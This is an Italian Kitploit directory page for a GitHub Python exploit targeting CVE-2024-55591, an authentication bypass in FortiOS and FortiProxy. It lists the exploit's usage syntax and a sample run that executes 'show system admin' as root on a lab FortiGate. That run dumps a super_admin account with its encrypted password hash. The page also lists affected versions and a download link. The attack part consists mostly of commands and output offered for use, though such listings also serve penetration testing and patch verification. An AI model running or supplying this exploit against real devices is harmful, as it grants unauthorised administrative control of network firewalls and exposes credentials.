Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
fortios-auth-bypass-exploit-CVE-2024-55591 — Exploit Python per CVE-2024-55591, che bypassa l'autenticazione FortiOS per eseguire comandi remoti su dispositivi FortiGate e FortiProxy vulnerabili. | Kitploit
Strumenti/GitHubGitHub/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubsysirq/fortios-auth-bypass-exploit-cve-2024-55591

fortios-auth-bypass-exploit-CVE-2024-55591

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit Python per CVE-2024-55591, che bypassa l'autenticazione FortiOS per eseguire comandi remoti su dispositivi FortiGate e FortiProxy vulnerabili.

Vedi Repository
341 anno faNon ancora revisionato

CVE-2024-55591

Un exploit per il bypass dell'autenticazione Fortinet FortiOS Vulnerabile

Descrizione

Usa questo exp; puoi bypassare l'autenticazione ed eseguire comandi

UTILIZZO

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py 
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t

Demo

image-20250122220404985

image-20250122220502121

image-20250122220502121

Output

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
    next
end

Versioni interessate

  • FortiOS 7.0.0 fino alla 7.0.16
  • FortiProxy 7.0.0 fino alla 7.0.19
  • FortiProxy 7.2.0 fino alla 7.2.12
Scarica lo strumento